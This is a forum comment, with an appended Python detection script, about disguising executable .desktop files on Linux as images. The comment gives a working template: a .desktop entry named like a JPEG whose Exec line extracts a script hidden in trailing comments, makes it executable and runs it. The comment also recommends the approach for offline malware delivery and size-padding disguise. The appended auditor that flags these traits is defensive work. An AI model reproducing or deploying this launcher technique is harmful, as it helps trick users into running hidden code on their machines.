Has anyone mentioned the possibility yet of embedding the payload (malicious script, etc.) within the .desktop file? The specification allows for commenting, after all, which is a free way to embed text -- the question then merely becomes one of extracting the text from the "comments" at the tail end of a .desktop file, outputting it to its own file, and executing.
To wit, in a file called blah.desktop:
[OMGMALICIOUS]
Version=1.0
Type=Application
Name=HOT XXX JENNA JAMESON.jpg
Icon=jpegicon.png
Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > malscript; chmod 777 malscript; ./malscript"
##!/bin/bash
##
## OMG MALICIOUS
#
#echo OMG HI PWNED J00 > pwned
Which would then open the door to other types of scripts being embedded within the .desktop file, such as Python or Perl (the latter of which is probably the even more widespread of the two!)
This method has a few benefits over the described one, including: offline execution of malware, no further download beyond the .desktop required; semi-easy modification of the embedded script (you can add or remove lines as you wish and even leave comments in thanks to the tail and sed commands used); and the embedded file could easily make the .desktop file it's contained in reach file size levels (something I, personally, look at with certain files) roughly equivalent to the file it's attempting to masquerade as. Theoretically, so long as you remembered to escape things properly, you could possibly even include binaries within the .desktop file in this manner(!!!!).
This of course comes no closer to the holy grail that is root, but still an interesting twist on the same process...
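
A defender-side check for the pattern described in the comment above, added here as an example and not part of the original comment: it audits the text of a .desktop file for a Name that mimics a data file, an Exec that runs inline interpreter code or reads text back out of a .desktop file, and a comment block trailing the last key. The function name, finding names, regexes and the three-line threshold are assumptions chosen for illustration, and the sample entry is constructed.

```python
import re

# Heuristic patterns; the extension and tool lists are illustrative assumptions.
FILE_EXT = re.compile(r"\.(jpe?g|png|gif|pdf|docx?|mp[34]|avi|txt)$", re.I)
INLINE_CODE = re.compile(r"^(\S*/)?(((ba|da|z)?sh)\s+-c|(python[\d.]*|perl)\s+-[ce])\b")
EXTRACTOR = re.compile(r"\b(tail|head|sed|awk|grep|cat|dd|base64)\b")

def audit_desktop_entry(text):
    """Return a sorted list of finding names for one .desktop file's contents."""
    findings = set()
    lines = text.splitlines()
    last_key = -1
    for i, raw in enumerate(lines):
        line = raw.strip()
        if not line or line[0] in "#[":
            continue  # blank line, comment, or group header
        last_key = i
        key, _, value = line.partition("=")
        key, value = key.split("[")[0].strip(), value.strip()  # Name[de] -> Name
        if key == "Name" and FILE_EXT.search(value):
            findings.add("name-mimics-data-file")
        if key == "Exec":
            if INLINE_CODE.search(value):
                findings.add("exec-inline-interpreter")
            if EXTRACTOR.search(value) and ".desktop" in value:
                findings.add("exec-reads-desktop-file")
    # Comment lines after the last key=value line: where appended text would sit.
    tail = [l.strip() for l in lines[last_key + 1:] if l.strip().startswith("#")]
    if any(l.lstrip("#").startswith("!/") for l in tail):
        findings.add("trailing-shebang-in-comments")
    if len(tail) >= 3:
        findings.add("trailing-comment-block")
    return sorted(findings)

# Constructed sample modelled on the blah.desktop entry in the comment above.
SAMPLE = r"""[Desktop Entry]
Version=1.0
Type=Application
Name=holiday.jpg
Icon=jpegicon.png
Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > out"
##!/bin/bash
##
## placeholder body
#echo placeholder > marker
"""

if __name__ == "__main__":
    print(audit_desktop_entry(SAMPLE))
```

Each finding is a heuristic on its own; launchers that legitimately wrap a command in a shell will trip the inline-interpreter check, so the combination of findings is what merits a closer look.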